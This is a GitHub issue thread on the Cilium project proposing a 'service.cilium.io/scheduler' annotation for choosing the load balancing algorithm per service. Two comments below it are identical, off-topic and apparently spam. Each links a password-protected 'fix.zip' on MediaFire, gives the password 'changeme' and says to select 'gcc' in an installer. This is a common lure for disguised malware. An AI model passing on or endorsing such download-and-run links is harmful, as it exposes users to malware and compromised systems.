### ISSUE TITLE
CFP: Per-service Load Balancing Algorithm Selection

### ISSUE THREAD

**Issue by AwesomePatrol** [cilium/cilium#34577]
## Cilium Feature Proposal

Add `service.cilium.io/scheduler` service annotation to dynamically change used load balancing algorithm.

[CFP in Google Docs](https://docs.google.com/document/d/1pDni4HKGWLdg_BEL1cgJkcOZXUjgvihYsrI-EcLCNog/edit?usp=sharing)

Mirrored in https://github.com/cilium/design-cfps/pull/56

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
